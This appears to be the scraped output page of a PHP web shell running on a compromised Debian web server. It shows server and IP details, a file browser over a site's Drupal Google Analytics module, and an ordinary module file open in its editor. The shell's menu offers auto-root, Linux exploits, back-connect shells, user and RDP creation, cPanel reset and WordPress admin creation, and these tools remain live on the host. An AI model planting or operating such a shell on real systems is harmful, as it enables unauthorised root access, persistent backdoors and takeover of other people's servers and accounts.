Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.138.101.51
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
google_analytics /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE.txt
17.67
KB
-rw-r--r--
README.txt
2.56
KB
-rw-r--r--
googleanalytics.admin.inc
42.38
KB
-rw-r--r--
googleanalytics.admin.js
4.5
KB
-rw-r--r--
googleanalytics.debug.js
6.6
KB
-rw-r--r--
googleanalytics.info
433
B
-rw-r--r--
googleanalytics.install
22.51
KB
-rw-r--r--
googleanalytics.js
5.36
KB
-rw-r--r--
googleanalytics.module
25.51
KB
-rw-r--r--
googleanalytics.test
34.58
KB
-rw-r--r--
googleanalytics.test.js
8.12
KB
-rw-r--r--
googleanalytics.tokens.inc
1.4
KB
-rw-r--r--
googleanalytics.variable.inc
2.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : googleanalytics.variable.inc
<?php /** * @file * Definition of variables for Variable API module. */ /** * Implements hook_variable_info(). */ function googleanalytics_variable_info($options) { $variables['googleanalytics_account'] = array( 'type' => 'string', 'title' => t('Web Property ID', array(), $options), 'default' => 'UA-', 'description' => t('This ID is unique to each site you want to track separately, and is in the form of UA-xxxxxxx-yy. To get a Web Property ID, <a href="@analytics">register your site with Google Analytics</a>, or if you already have registered your site, go to your Google Analytics Settings page to see the ID next to every site profile. <a href="@webpropertyid">Find more information in the documentation</a>.', array('@analytics' => 'http://www.google.com/analytics/', '@webpropertyid' => url('https://developers.google.com/analytics/resources/concepts/gaConceptsAccounts', array('fragment' => 'webProperty'))), $options), 'required' => TRUE, 'group' => 'googleanalytics', 'localize' => TRUE, 'multidomain' => TRUE, 'validate callback' => 'googleanalytics_validate_googleanalytics_account', ); return $variables; } /** * Implements hook_variable_group_info(). */ function googleanalytics_variable_group_info() { $groups['googleanalytics'] = array( 'title' => t('Google Analytics'), 'description' => t('Configure tracking behavior to get insights into your website traffic and marketing effectiveness.'), 'access' => 'administer google analytics', 'path' => array('admin/config/system/googleanalytics'), ); return $groups; } /** * Validate Web Property ID variable. */ function googleanalytics_validate_googleanalytics_account($variable) { // Replace all type of dashes (n-dash, m-dash, minus) with the normal dashes. $variable['value'] = str_replace(array('–', '—', '−'), '-', $variable['value']); if (!preg_match('/^UA-\d+-\d+$/', $variable['value'])) { return t('A valid Google Analytics Web Property ID is case sensitive and formatted like UA-xxxxxxx-yy.'); } }
Close